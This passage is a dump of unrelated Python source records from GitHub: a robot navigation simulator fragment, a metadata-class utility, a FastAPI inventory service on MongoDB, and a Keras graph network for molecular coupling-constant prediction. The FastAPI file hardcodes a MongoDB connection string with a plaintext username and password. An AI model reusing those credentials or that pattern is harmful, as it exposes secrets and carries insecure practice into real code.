get_obs(self, pose=None):\n if pose is None:\n pose = self.agent.pose\n colors = 
self.get_visual_obs(pose).flatten() \n        colors = to_onehot_array(colors, len(LABELS)).flatten()\n        dists = self.get_depth_obs(pose).flatten()\n        out = np.concatenate((colors, dists, [self.check_collision()]))\n        return out\n\n    def draw_trajectory(self, viz, traj_poses, color=(59,181,207)):\n        if traj_poses is not None:\n            traj_pix = pose2pixel(traj_poses, viz.shape)\n            for i in range(len(traj_pix)-1):\n                cv2.line(viz, point(traj_pix[i]), point(traj_pix[i+1]), color, thickness=4)\n        return viz\n    \n    \n    def __repr__(self):\n        return \"{}-{}\".format(numify(self.root), self.target)\n    \n    def shortest_agent(self):\n        action = None\n        while action != Action.END:\n            action = self.next_shortest_path_action()\n            self.makeActions(action)\n        return self.step_counter\n\n    def shortest_agent_images(self):\n        action = None\n        while action != Action.END:\n            yield self.display(draw_measurements=True) \n            action = self.next_shortest_path_action()\n            self.makeActions(action)\n    \n    def get_all_data(self):\n        \"\"\"\n        Used to make a zero mean / unit variance scaler\n        \"\"\"\n        data = []\n        action = None\n        while action != Action.END:\n            data.append(self.get_obs(self.agent.pose))\n            # Move along shortest path\n            action = self.next_shortest_path_action()\n            self.makeActions(action)\n        return np.asarray(data)\n    \n    def make_video(self, folder):\n        width = 700\n        height = 588\n        fps = 30\n        fourcc = VideoWriter_fourcc(*'MP42')\n        vfile = '{}/{}.avi'.format(folder, str(self)) \n        video = VideoWriter(vfile, fourcc, float(fps), (width, height))\n        \n        traj = self.planner(self.agent.pose, self.goal.pose)\n        \n        while True:\n            img = self.display()\n            self.draw_trajectory(img, traj)\n            img = resize50(img)\n            video.write(img)\n            # Move along shortest path\n            action = self.next_shortest_path_action()\n            self.makeActions(action)\n            if action == Action.END:\n                break\n\n        video.release()\n\n        print('Video saved to: {}'.format(vfile))\n        return self.step_counter\n\n\nif __name__ == \"__main__\":\n    from rslang_utils import load_data\n    random_trial = random.sample(load_data(), 1)[0]\n    trial = RobotSlangSimulator(random_trial['scan'])\n    trial.play()\n    import ipdb; ipdb.set_trace()\n    \n","repo_name":"MichiganCOG/RobotSlangBenchmark","sub_path":"rslang_simulator.py","file_name":"rslang_simulator.py","file_ext":"py","file_size_in_byte":13411,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"}
{"seq_id":"15838126842","text":"from library.metadata_class.convert_type import *\nfrom library.metadata_class.opus import *\nfrom library.metadata_class.episode import *\nfrom library.metadata_class.sequence import *\nfrom library.metadata_class.scene import *\nfrom library.metadata_class.shot import *\n\n\ndef class_from_dict(s: dict) -> Union[Opus, Season, Episode, Sequence, Scene, Shot]:\n    \"\"\"\n    :param s: dict of Metadata\n    :return : Class of Metadata\n\n    Check which Metadata type the dict contains and convert it to the corresponding Metadata class\n    \"\"\"\n    type_list = ['seasons', 'episodes', 'sequences', 'scenes', 'shots', 'persons']\n    class_list = [Opus, Season, Episode, Sequence, Scene, Shot]\n    for i, key_type in enumerate(type_list):\n        if key_type in s.keys():\n            return class_list[i].from_dict(s)\n\n\ndef class_to_dict(x: Any) -> dict:\n    \"\"\"\n    :param x: Class of Metadata\n    :return : dict\n\n    convert Class to dict\n    \"\"\"\n    type_list = [Opus, Season, Episode, Sequence, Scene, Shot]\n    for class_type in type_list:\n        if isinstance(x, class_type):\n            return to_class(class_type, x)\n
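\n\n# The __main__ block below is a small end-to-end demo: it builds an Opus tree (either from\n# misaeng.json or as an empty default), fills in default values and ids, then dumps the opus,\n# one scene and one shot to separate JSON files.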
\n\nif __name__ == '__main__':\n    import json\n    import os\n    json_dir = 'json/'\n    if not os.path.exists(json_dir):\n        os.makedirs(json_dir)\n\n    # get metadata class\n    # 1. use_misaeng = True\n    #    read \"misaeng.json\"\n    # 2. use_misaeng = False\n    #    create empty metadata\n    use_misaeng = False\n    if use_misaeng:\n        misaeng_json = open(json_dir + 'misaeng.json', 'r', encoding='utf-8')\n        default_data = json.load(misaeng_json)\n        metadata_class = class_from_dict(default_data)\n    else:\n        default_data = {'opus_id': \"1005\", \"opus_name__kr\": \"예시\", \"opus_name__en\": \"Example\"}\n        metadata_class = Opus.from_dict(default_data)\n\n    # set default values and update ids\n    metadata_class.init_class_variables()\n    metadata_class.update_metadata()\n\n    # get opus dict(), scene dict() and shot dict()\n    scene_idx = 0\n    shot_idx = 0\n\n    opus_dict = metadata_class.to_dict()\n\n    scene_class = metadata_class.seasons[0].episodes[0].sequences[0].scenes[scene_idx]\n    scene_dict = scene_class.to_dict()\n\n    shot_class = scene_class.shots[shot_idx]\n    shot_dict = shot_class.to_dict()\n\n    # print opus, scene, shot to JSON file\n    opus_file = open(json_dir + '{}.json'.format(default_data['opus_id']), 'w', encoding='utf-8')\n    scene_file = open(json_dir + '{}_scene_{}.json'.format(default_data['opus_id'], scene_idx), 'w', encoding='utf-8')\n    shot_file = open(json_dir + '{}_scene_{}_shot_{}.json'.format(default_data['opus_id'], scene_idx, shot_idx), 'w', encoding='utf-8')\n    json.dump(opus_dict, opus_file, indent=2, ensure_ascii=False)\n    json.dump(scene_dict, scene_file, indent=2, ensure_ascii=False)\n    json.dump(shot_dict, shot_file, indent=2, ensure_ascii=False)\n    print(\"{}.json is finished\".format(default_data['opus_id']))\n","repo_name":"sung0471/Flask-RESTful-Server","sub_path":"library/metadata_class/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"1883267707","text":"from fastapi import FastAPI\r\nfrom pydantic import BaseModel\r\nfrom pymongo import MongoClient\r\n\r\n# Creating instance of mongo client\r\nclient = MongoClient(\"mongodb://intern_23:intern%40123@192.168.0.220:2717/interns_b2_23\")\r\n\r\n# Define a Pydantic model for items\r\nclass Item(BaseModel):\r\n    name: str\r\n    description: str\r\n    price: float\r\n\r\napp = FastAPI()\r\n\r\n# POST endpoint for adding items to inventory\r\n@app.post(\"/add_items\")\r\ndef create_item(item: Item):\r\n    db = client.interns_b2_23\r\n    item_instance = db.subhash\r\n    item_instance.insert_one(item.dict())\r\n    return {\"message\": \"Item added successfully\"}\r\n\r\n# GET endpoint for retrieving items by name\r\n@app.get(\"/getItemByName/{item_name}\")\r\ndef read_item(item_name: str):\r\n    db = client.interns_b2_23\r\n    item_instance = db.subhash\r\n    item = item_instance.find_one({\"name\": item_name})\r\n    if item:\r\n        return {\"item details\": item}\r\n    else:\r\n        return {\"error\": \"Item not found\"}\r\n\r\n# PUT endpoint for updating items by name\r\n@app.put(\"/item/{item_name}\")\r\ndef update_item(item_name: str, item: Item):\r\n    db = client.interns_b2_23\r\n    item_instance = db.subhash\r\n    condition = {\"name\": item_name}\r\n    update = {\"$set\": item.dict()}\r\n    result = item_instance.update_one(condition, update)\r\n    if result.modified_count > 0:\r\n        return {\"message\": \"Item updated successfully\"}\r\n    else:\r\n        return {\"error\": \"Item not found\"}\r\n\r\n# DELETE endpoint for deleting items by name\r\n@app.delete(\"/deleteItemsByName/{item_name}\")\r\ndef delete_item(item_name: 
str):\r\n    db = client.interns_b2_23\r\n    item_instance = db.subhash\r\n    result = item_instance.delete_one({\"name\": item_name})\r\n    if result.deleted_count > 0:\r\n        return {\"message\": \"Item deleted successfully\"}\r\n    else:\r\n        return {\"error\": \"Item not found\"}\r\n","repo_name":"subash291/Fastapi","sub_path":"pythonProject4/item.py","file_name":"item.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"2377506785","text":"import tensorflow as tf\nfrom tensorflow.keras.models import Model\nfrom tensorflow import keras\nfrom tensorflow.keras.layers import Conv1D, Conv2D, Input, concatenate, Layer, BatchNormalization, Reshape, Lambda, ReLU\nimport tensorflow.keras.activations as act\n\nfrom scipy.stats import ortho_group\n\nimport numpy as np\nimport pandas as pd\nimport pickle\n\npredict = False # compute predictions on test dataset\nload = False # load the weights from a previous run\n\nnum_epochs = 1\nvalid_size = 0 # rough number of samples kept aside for validation. A value of 0 turns off validation\nlearning_rate = 0.0005 \n\nsave_interval = 3 # how often (epoch-wise) do we save the model's weights\nnum_ave = 10 # number of epochs to average the predictions over\nrav = 0.2 # 1/half-life for the exponential moving average of cross validation predictions\n\nbs = 48 # batch size, chosen so that the last batch is not too small \ntest_bs = 193 # assuming 8091 validation samples\npred_bs = 194 # 45772 % 194 = 182 \n\nuse_bonds = True\nuse_pos = False\nuse_dist_pow = 4\nbond_vec_only = True \nuse_angles = True\nuse_charge = True\nuse_mag_contrib = True\n \n#use_shield = 'trace' \nuse_shield = 'eigenvalues' \n#use_shield = 'tensor' # doesn't seem to work, even in fixed coo system\nrandom_frame = True\nrandom_pos = 0.0\n\nweight_file = \"squid-weights/weights.h5\"\nperm_file = \"squid-weights/permutation.p\"\n\ncontrib_weight = 0.2\ncharge_weight = 0.2\nshield_weight = 0.2\n\n# it would be better to get this from the dataset...\nnum_mag_contrib = 4\nnum_atom_per_mol = 29\nnum_pair_type = 8\nnum_atom_type = 5\nnum_bond_type = 5\nnum_bond_geom_feat = 3 + use_dist_pow + (1 if use_angles else 0) \nnum_atom_geom_feat = 3 \n\n# squid network geometry parameters\n\ngcvs = 384 # vertex size for graph convs\ngces = 48 # edge size for graph convs\novs = 512 # on-vertex FC size\noes = 384 # on-edge FC size\ntevs = 128 # vertex size before vertex -> edge conv \ntees = 128 # edge size after vertex -> edge conv\n \n\nprint(\"Input features:\")\nprint(\" - atomic number distinctions\")\nif use_bonds: print(\" - basic chemical bond types\")\nif bond_vec_only: print(\" - bond vectors\")\nelse: print(\" - vectors between any two atoms, divided by distance\")\nif use_dist_pow > 0: print(\" - inverse distance between all atom pairs and its powers up to\", use_dist_pow)\nif use_angles: print(\" - angles for 2JXX pairs and dihedral angles for 3JXX pairs\")\nif use_pos: print(\" - atom positions\")\n\nprint(\"Auxiliary targets:\")\nif use_charge: print(\" - Mulliken charges\", charge_weight)\nif use_shield == 'tensor': print(\" - Shielding tensors\", shield_weight)\nif use_shield == 'trace': print(\" - Traces of the shielding tensors\", shield_weight)\nif use_shield == 'eigenvalues': print(\" - Eigenvalues of the shielding tensors\", shield_weight)\nif use_mag_contrib: print(\" - All magnetic coupling contributions\", contrib_weight)\n \nprint(\"Data extension:\")\nif random_frame: print(\" - Randomized reference 
frame\")\nif random_pos > 0.0: print(\" - Noise on positions\", random_pos)\n \nroot = \"../input/\"\n\nfrom tensorflow.python.keras.utils.data_utils import Sequence\n\n# does 0-hot for category 0\ndef one_hot(x, num_cat):\n if len(x.shape)==2:\n return np.eye(num_cat+1, dtype=np.bool)[x][:,:,1:] \n elif len(x.shape)==1:\n return np.eye(num_cat+1, dtype=np.bool)[x][:,1:] \n else:\n print(\"one_hot: unexpected shape:\", x.shape)\n exit(1)\n\ndef make_geom(atom_pos, atom_type, bond_type, pair_type, pair_angles): \n n = atom_pos.shape[0] #num_atom_per_mol\n k = num_atom_type\n \n geom = np.zeros((n,n, num_bond_geom_feat)) \n\n # vector between every pairs\n delta = atom_pos.reshape(1,n,3) - atom_pos.reshape(n,1,3)\n \n # compute distances\n ir = np.reshape(np.sqrt(np.sum(delta**2, axis=2)), [n,n])\n nonzero = ir > 1e-6\n ir[nonzero] = 1/ir[nonzero]\n bond_mask = (bond_type > 0).reshape(n,n,1)\n bond_vec = delta * ir.reshape(n,n,1) * bond_mask\n \n # store unit bond vectors\n if bond_vec_only: geom[:,:,:3] = bond_vec # bond_vec * ir.reshape(n,n,1) #delta * bond_mask\n else: geom[:,:,:3] = delta * ir.reshape(n,n,1)**2 # or all vectors / distance\n ind = 3\n\n # store powers of the inverse distance between any two atoms \n if use_dist_pow > 0: \n geom[:,:,ind] = ir ; ind += 1\n for e in range(1,use_dist_pow):\n geom[:,:,ind] = geom[:,:,ind-1]*ir ; ind += 1\n\n # cos of angle between pairs bonded to the same atom\n if use_angles:\n geom[:,:,ind] = pair_angles \n \n return geom\n\ndef process_mol(atom_pos, atom_type, bond_type, pair_type, pair_angles, in_ring):\n geom = make_geom(atom_pos, atom_type, bond_type, pair_type, pair_angles)\n atom = np.concatenate((one_hot(atom_type, num_atom_type), np.expand_dims(in_ring, -1)), axis=-1)\n bond = one_hot(bond_type, num_bond_type)\n # add adjacency\n nv = bond.shape[0]\n identity = np.expand_dims(np.eye(nv, dtype=np.bool), -1)\n adjacency = np.sum(bond, axis=-1, keepdims=True) + identity\n bond = np.concatenate((adjacency, bond), axis=-1)\n return geom, atom, bond\n\nclass Generator(Sequence):\n def __init__(self, data, batch_size=92, extra=[], shuffle=False, use_mag_contrib=False, use_charge=False, use_shield=False, predict=False):\n self.batch_size = batch_size\n self.shuffle = shuffle\n self.use_mag_contrib = use_mag_contrib\n self.use_charge = use_charge\n self.use_shield = use_shield\n self.predict = predict\n\n self.data = data\n self.data_extra = extra\n\n self.random_frame = random_frame if shuffle else False\n self.random_pos = random_pos if shuffle else 0.0\n \n self.num_sample = len(data) \n\n self.on_epoch_end()\n\n def __len__(self):\n 'Number of batches per epoch'\n return int(np.ceil(self.num_sample / self.batch_size))\n\n def get_indexes(self, index):\n return self.indexes[index*self.batch_size:min((index+1)*self.batch_size, self.num_sample)]\n\n def __getitem__(self, index):\n 'Generate one batch of data'\n return self.__data_generation(self.get_indexes(index))\n\n def on_epoch_end(self):\n 'Updates indexes after each epoch'\n self.indexes = np.arange(self.num_sample)\n if self.shuffle == True:\n np.random.shuffle(self.indexes)\n\n # needs to be called before rather than after the epoch since shuffling happens at epoch end...\n def get_pair_ids(self):\n num_mol = len(self.indexes)\n nam = num_atom_per_mol\n pair_ids = [] \n pairs = np.zeros((num_mol, nam, nam), dtype=np.bool)\n\n for m in self.indexes:\n _, _, _, pair_type, _, _, pair_id = self.data[m]\n na = pair_type.shape[0]\n pairs[m,:na,:na] = np.triu(pair_type > 0)\n 
pair_ids.extend(pair_id[pairs[m,:na,:na]])\n\n return pair_ids, pairs\n \n def get_targets(self):\n num_mol = len(self.indexes)\n nam = num_atom_per_mol\n all_pair_type = np.zeros((num_mol, nam, nam), dtype=np.int32)\n mag_tot = np.zeros((num_mol, nam, nam), dtype=np.float32)\n\n for m in self.indexes:\n _, _, _, pair_type, _, _, raw_mag = self.data[m]\n na = pair_type.shape[0]\n all_pair_type[m,:na,:na] = pair_type\n i = raw_mag[:,1].astype(np.int)\n j = raw_mag[:,2].astype(np.int)\n mag_tot[m, i, j] = mag_tot[m, j, i] = raw_mag[:,3]\n\n return mag_tot, all_pair_type\n\n def __data_generation(self, indexes):\n \n data = [self.data[i] for i in indexes] \n\n num_mol = len(data)\n nam = num_atom_per_mol\n atom = np.zeros((num_mol, nam, num_atom_type+1), dtype=np.bool) # +1 for ring atoms\n bond = np.zeros((num_mol, nam, nam, num_bond_type+1), dtype=np.bool) # +1 for adjacency\n geom = np.zeros((num_mol, nam, nam, num_bond_geom_feat), dtype=np.float32)\n pair = np.zeros((num_mol, nam, nam, num_pair_type), dtype=np.bool)\n\n if use_pos:\n atom_geom = np.zeros((num_mol, nam, num_atom_geom_feat), dtype=np.float32)\n\n extra = len(self.data_extra) > 0\n\n if extra:\n data_extra = [self.data_extra[i] for i in indexes]\n atom_charge = np.zeros((num_mol, nam, 1), dtype=np.float32)\n if self.use_shield == 'tensor':\n atom_shield = np.zeros((num_mol, nam, 3,3), dtype=np.float32)\n elif self.use_shield == 'trace':\n atom_shield = np.zeros((num_mol, nam, 1), dtype=np.float32)\n elif self.use_shield == 'eigenvalues':\n atom_shield = np.zeros((num_mol, nam, 3), dtype=np.float32)\n\n if not self.predict:\n mag = np.zeros((num_mol, nam, nam, num_mag_contrib), dtype=np.float32)\n mag_tot = np.zeros((num_mol, nam, nam), dtype=np.float32)\n \n for m, mol in enumerate(data):\n atom_pos_abs, atom_type, bond_type, pair_type, pair_angles, in_ring, _ = mol\n \n # random rotation matrix, to remove dependence on the reference frame\n if random_frame: \n R = ortho_group.rvs(dim=3).astype(np.float32)\n atom_pos = atom_pos_abs @ R \n else:\n atom_pos = atom_pos_abs\n \n if self.random_pos > 0.0: atom_pos += np.random.normal(scale = self.random_pos, size=atom_pos.shape)\n\n na = pair_type.shape[0]\n pair[m,:na,:na,:] = one_hot(pair_type, num_pair_type)\n \n geom[m,:na,:na,:], atom[m,:na,:], bond[m,:na,:na,:] = process_mol(atom_pos, atom_type, bond_type, pair_type, pair_angles, in_ring)\n \n if use_pos:\n atom_geom[m,:na,:] = atom_pos\n\n if not self.predict:\n raw_mag = mol[-1]\n mag_tot[m, raw_mag[:,1].astype(np.int), raw_mag[:,2].astype(np.int)] = raw_mag[:,3]\n mag_tot[m, raw_mag[:,2].astype(np.int), raw_mag[:,1].astype(np.int)] = raw_mag[:,3]\n\n if self.use_mag_contrib: \n mag[m, raw_mag[:,1].astype(np.int), raw_mag[:,2].astype(np.int), :] = raw_mag[:,4:8]\n mag[m, raw_mag[:,2].astype(np.int), raw_mag[:,1].astype(np.int), :] = raw_mag[:,4:8]\n \n if self.use_charge and extra: \n atom_charge[m, :na, 0] = data_extra[m][:, 0] \n \n if self.use_shield and extra: \n mol_extra = data_extra[m]\n T = np.reshape(mol_extra[:, 1:], (na, 3,3))\n # assuming both index transform as inverse of coordinates. 
Is that correct?\n            # also we need to worry about the potential pseudo-ness of the tensor, given we use the whole ortho group\n                if random_frame and self.use_shield == 'tensor':\n                    T = np.einsum('ij,aik->ajk', R, np.einsum('aij,jk->aik', T, R))\n\n                if self.use_shield == 'tensor':\n                    atom_shield[m, :na, :,:] = T \n                elif self.use_shield == 'trace':\n                    atom_shield[m, :na, 0] = np.einsum('aii->a', T)\n                elif self.use_shield == 'eigenvalues':\n                    atom_shield[m, :na, :] = np.linalg.eigvalsh(T) \n                else:\n                    print(\"unknown shielding tensor use type:\", self.use_shield)\n                    exit(1)\n\n        # both branches were identical here; the bond tensor is always fed to the model,\n        # and use_bonds only changes how the edge input inE is assembled further below\n        inputs = [atom, bond, geom, pair]\n        if use_pos: inputs.append(atom_geom)\n        \n        if not self.predict:\n            targets = [mag_tot]\n            if self.use_mag_contrib: targets.append(mag)\n            if self.use_charge and extra: targets.append(atom_charge)\n            if self.use_shield and extra: targets.append(atom_shield)\n            return inputs, targets\n        else: \n            return inputs\n\n    \nprint(\"loading the data\")\n \ntrain_data = pickle.load(open(root+\"pickled-molecules/molecules.p\", \"rb\"))\npred_data = pickle.load(open(root+\"pickled-molecules/molecules_test.p\", \"rb\"))\nextra_data = pickle.load(open(root+\"pickled-molecules/molecules_extra.p\", \"rb\"))\n\nnum_tot = len(train_data)\nparams = { 'use_mag_contrib': use_mag_contrib, \n           'use_charge': use_charge,\n           'use_shield': use_shield }\n\nif valid_size > 0:\n    if load:\n        print(\"loading choice of validation instances\")\n        perm, num_test = pickle.load( open( root+perm_file, \"rb\" ) )\n    else:\n        num_test = valid_size + ((num_tot - valid_size) % bs)\n        perm = np.random.permutation(range(num_tot))\n        \n    pickle.dump((perm, num_test), open( \"permutation.p\", \"wb\" ))\n    \n    def sep(X): return [X[i] for i in perm[:num_test]], [X[i] for i in perm[num_test:]] \n\n    print(f\"setting {num_test} samples aside for validation\")\n\n    valid_data, train_data = sep(train_data)\n    valid_extra, extra_data = sep(extra_data)\n    validation_generator = Generator(valid_data, shuffle=False, extra=valid_extra, batch_size=test_bs, **params) \n\ntraining_generator = Generator(train_data, shuffle=True, extra=extra_data, batch_size=bs, **params)\nprediction_generator = Generator(pred_data, predict=True, shuffle=False, batch_size=pred_bs, **params)\n\nprint(\"building the network\") \n\nclass toEdges(Layer):\n\n    def __init__(self, num_edge_filter, relu=False, **kwargs):\n        self.ney = num_edge_filter\n        self.relu = relu\n        super(toEdges, self).__init__(**kwargs)\n\n    def build(self, input_shape):\n        shape_V = input_shape\n\n        self.nv = int(shape_V[1])\n        self.nvx = int(shape_V[2])\n\n        self.W = self.add_weight(name='kernel', shape=(self.nvx, self.nvx, self.ney), initializer='uniform', trainable=True)\n        self.b = self.add_weight(name='kernel', shape=(self.ney,), initializer='zeros', trainable=True)\n\n        super(toEdges, self).build(input_shape)\n\n    def call(self, V):\n\n        aux = tf.einsum('bux,xyf->buyf', V, self.W)\n        E = tf.einsum('buyf,bvy->buvf', aux, V) + self.b\n\n        return act.relu(E) if self.relu else E\n\n    def compute_output_shape(self, input_shape):\n        return (self.nv, self.ney, self.nv)\n\n\nclass GraphConv(Layer):\n\n    def __init__(self, num_vertex_filter, relu=False, **kwargs):\n        self.nvy = num_vertex_filter\n        self.relu = relu\n        super(GraphConv, self).__init__(**kwargs)\n\n    def build(self, input_shape):\n        shape_V, shape_E = input_shape\n        self.nv = int(shape_V[1])\n        self.nvx = int(shape_V[2])\n        self.nex = int(shape_E[3])\n
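\n        # Descriptive note on shapes: E is (batch, nv, nv, nex) edge features and V is\n        # (batch, nv, nvx) vertex features, so W maps every (edge feature, vertex feature)\n        # pair to nvy output channels:\n        #   V2[b,u,f] = sum over v, x, y of E[b,u,v,x] * V[b,v,y] * W[x,y,f]   (see call below)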
\n        self.W = self.add_weight(name='kernel', shape=(self.nex, self.nvx, self.nvy), initializer='uniform', trainable=True)\n        self.b = self.add_weight(name='kernel', shape=(self.nvy,), initializer='zeros', trainable=True)\n\n        super(GraphConv, self).build(input_shape)\n\n    def call(self, x):\n        V, E = x\n        \n        aux = tf.einsum('buvx,bvy->buxy', E, V)\n        V2 = tf.einsum('buxy,xyf->buf', aux, self.W) + self.b\n\n        return act.relu(V2) if self.relu else V2\n\n    def compute_output_shape(self, input_shape):\n        return (self.nv, self.nvy)\n\n\n# some useful layers\nrelu = lambda x: ReLU()(x)\nreban = lambda x: ReLU()(BatchNormalization()(x))\nbaner = lambda x: BatchNormalization()(ReLU()(x))\n\nonEdge = lambda n: Conv2D(n, kernel_size=(1,1), strides=(1,1))\ndef onVertex(n, **kwargs): return Conv1D(n, kernel_size=(1,), strides=(1,), **kwargs)\ndef Symmetrize(perm=(0,2,1), **kwargs): return Lambda(lambda T: 0.5*(T + tf.transpose(T, perm=perm)), **kwargs)\ndef Trace(**kwargs): return Lambda(lambda T: tf.reshape(tf.linalg.trace(T), tf.concat([tf.shape(T)[:-2], [1]], axis=0)), **kwargs)\n\ndef SumPool(axis=-1, keepdims=False, **kwargs): \n    return Lambda(lambda arg: tf.reduce_sum(arg, axis=axis, keepdims=keepdims), **kwargs)\n\ndef MaskedSumPool( axis=-1, keepdims=False, **kwargs): \n    return Lambda(lambda args: tf.reduce_sum(args[0]*args[1], axis=axis, keepdims=keepdims), **kwargs)\n\ndef gcblock(m, v, e):\n    return reban(GraphConv(m)([v, e]))\n    \n# the Squid network\n\ninA = Input(shape=(num_atom_per_mol, num_atom_type+1)) \ninB = Input(shape=(num_atom_per_mol, num_atom_per_mol, num_bond_type+1)) \ninG = Input(shape=(num_atom_per_mol, num_atom_per_mol, num_bond_geom_feat)) \ninP = Input(shape=(num_atom_per_mol, num_atom_per_mol, num_pair_type))\n\nif use_bonds:\n    inE = concatenate([inG, inB, inP]) \nelse:\n    inE = concatenate([inG, inP]) \n\nif use_pos: \n    inX = Input(shape=(num_atom_per_mol, num_atom_geom_feat)) \n    inV = concatenate([inA, inX])\nelse:\n    inV = inA\n\ndef init_edges(out_size):\n    e = inE\n    e = reban(onEdge(oes)(e))\n    e = reban(onEdge(oes)(e))\n    e = reban(onEdge(oes)(e))\n    return reban(onEdge(out_size)(e))\n\ndef init_vertices(out_size):\n    v = inV\n    v = reban(onVertex(ovs)(v))\n    v = reban(onVertex(ovs)(v))\n    v = reban(onVertex(ovs)(v))\n    return reban(onVertex(out_size)(v)) \n\nv = init_vertices(gcvs)\ne = init_edges(gces)\n\nv = gcblock(gcvs, v, e)\nv = gcblock(gcvs, v, e)\nv = gcblock(gcvs, v, e)\n\n\nif use_charge: \n    v2 = relu(onVertex(ovs)(v))\n    outC = onVertex(1,name=\"charge\")(relu(onVertex(ovs)(v2))) \n    v = concatenate([outC, v])\n    \nif use_shield == 'tensor': \n    # this doesn't seem to work at all ... 
probably because they gave us the tensors in the wrong coo system\n v2 = relu(onVertex(ovs)(v))\n flatS = onVertex(9)(relu(onVertex(ovs)(v2))) \n outS = Symmetrize(perm=(0,1,3,2), name=\"shield\")(Reshape((num_atom_per_mol,3,3))(flatS))\n v = concatenate([Trace()(outS), v])\n \nelif use_shield == 'trace': \n v2 = relu(onVertex(ovs)(v))\n outS = onVertex(1, name=\"shield\")(relu(onVertex(ovs)(v2))) \n v = concatenate([outS, v])\n \nelif use_shield == 'eigenvalues': \n v2 = relu(onVertex(ovs)(v))\n outS = onVertex(3, name=\"shield\")(relu(onVertex(ovs)(v2))) \n v = concatenate([outS, v])\n\nv = gcblock(gcvs, v, e)\nv = gcblock(gcvs, v, e)\n\nv = reban(GraphConv(tevs)([v, e]))\ne = concatenate([reban(toEdges(tees)(v)), e])\n\ne = reban(onEdge(oes)(e))\ne = reban(onEdge(oes)(e))\ne = reban(onEdge(oes)(e))\n \nif use_mag_contrib: \n es = [onEdge(num_pair_type)(e) for i in range(num_mag_contrib)]\n es = [MaskedSumPool(keepdims=True)([e, inP]) for e in es]\n outM = Symmetrize(perm=(0,2,1,3), name=\"contrib\")(concatenate(es, axis=-1))\n outMtot = SumPool(name=\"mag\")(outM)\nelse:\n e = onEdge(num_pair_type)(e)\n outMtot = Symmetrize(perm=(0,2,1), name=\"mag\")(MaskedSumPool()([e, inP]))\n\nouts = [outMtot]\nif use_mag_contrib: outs.append(outM)\nif use_charge: outs.append(outC)\nif use_shield: outs.append(outS)\n\nif use_pos:\n model = Model(inputs=[inA, inB, inG, inP, inX], outputs=outs)\nelse:\n model = Model(inputs=[inA, inB, inG, inP], outputs=outs)\n\ndef MagLoss(P):\n def loss(M_true, M_pred):\n err = 0.0\n for k in range(num_mag_contrib):\n for t in range(num_pair_type):\n err += tf.math.log(tf.reduce_mean(tf.abs(tf.boolean_mask(M_true[:,:,:,k] - M_pred[:,:,:,k], P[:,:,:,t]))))\n return err/(num_mag_contrib*num_pair_type)\n return loss\n\ndef TotMagLoss(P):\n def loss(M_true, M_pred):\n err = 0.0\n for t in range(num_pair_type):\n err += tf.math.log(tf.reduce_mean(tf.abs(tf.boolean_mask(M_true - M_pred, P[:,:,:,t]))))\n return err/num_pair_type\n return loss\n\ndef ChargeLoss(A):\n def loss(C_true, C_pred):\n return tf.math.log(tf.reduce_mean(tf.abs(tf.boolean_mask(C_true - C_pred, tf.reduce_sum(A, axis=2)))))\n return loss\n \ndef ShieldLoss(A):\n if use_shield == 'tensor':\n def loss(S_true, S_pred):\n mask = tf.reduce_sum(A, axis=2)\n return tf.math.log(tf.reduce_mean(tf.boolean_mask(tf.norm(S_true - S_pred, axis=[-2,-1], ord='fro'), mask)))\n elif use_shield == 'trace' or use_shield == 'eigenvalues':\n def loss(S_true, S_pred):\n mask = tf.reduce_sum(A, axis=2)\n return tf.math.log(tf.reduce_mean(tf.boolean_mask(tf.abs(S_true - S_pred), mask)))\n\n return loss \n \nlosses = [TotMagLoss(inP)]\nloss_weights = [1.0]\nif use_mag_contrib: \n losses.append(MagLoss(inP))\n loss_weights.append(contrib_weight)\nif use_charge: \n losses.append(ChargeLoss(inA))\n loss_weights.append(charge_weight)\nif use_shield: \n losses.append(ShieldLoss(inA))\n loss_weights.append(shield_weight)\n \nopt = keras.optimizers.Adam(lr=learning_rate) \n\nmodel.compile(optimizer=opt, loss=losses, loss_weights=loss_weights)\n\nprint(\"learning rate = \", keras.backend.get_value(model.optimizer.lr))\n\n\nif load:\n print(\"loading weights from previous run\", end=\"...\")\n model.load_weights(root+weight_file)\n print(\"done\")\n\nif predict:\n print(\"producing prediction pair ids\")\n ids, pred_pairs = prediction_generator.get_pair_ids()\n pred_ids = pd.Series(ids, name=\"id\")\n\nif valid_size > 0:\n print(\"producing validation targets\")\n target_mag, val_pair = validation_generator.get_targets()\n \nfor epoch 
in range(num_epochs):\n\n    print(\"epoch \", epoch+1, \"/\", num_epochs)\n    \n    model.fit_generator(generator = training_generator, epochs=1, verbose=2) \n\n    # cross validation. After 10 epochs, starts a running average to smooth out fluctuations due to ADAM\n    if valid_size > 0:\n        val_preds = model.predict_generator(generator = validation_generator, verbose=2) \n        if type(val_preds) == list: val_mag = val_preds[0] \n        else: val_mag = val_preds\n        \n        if epoch < 10: ave_val_mag = val_mag\n        else: ave_val_mag = (1.0-rav)*ave_val_mag + rav*val_mag\n        \n        err_ave = 0.0\n        for t in range(num_pair_type):\n            mask = (val_pair==t+1)\n            err_ave += np.log(np.mean(np.abs(target_mag[mask]-ave_val_mag[mask])))/num_pair_type\n        \n        print(\"validation accuracy: \", err_ave)\n    \n    # saves the model weights for continuing the learning in a different session\n    if (epoch+1) % save_interval == 0 or epoch == num_epochs - 1:\n        filename = \"weights.h5\"\n        model.save_weights(filename)\n        print(\"saved model weights in \"+filename)\n    \n    # prediction using the test dataset. Also makes an average, which is useful for a large ADAM learning rate\n    n = epoch - (num_epochs-1-num_ave)\n    if predict and n >= 1:\n        print(\"computing predictions\")\n        preds = model.predict_generator(generator = prediction_generator, verbose=2) \n        if type(preds) == list: pred_mag = preds[0] \n        else: pred_mag = preds\n        \n        if n==1: pred_ave = pred_mag[pred_pairs]\n        else: pred_ave = ((n-1)*pred_ave + pred_mag[pred_pairs])/n\n\n        preds = pd.Series(pred_ave, name=\"scalar_coupling_constant\")\n        pd.concat([pred_ids, preds], axis = 1).sort_values('id', inplace=False).to_csv(\"predictions.csv\", index=False)\n    \n\n    ","repo_name":"sajedjalil/Data-Science-Pipeline-Detector","sub_path":"dataset/champs-scalar-coupling/Cédric 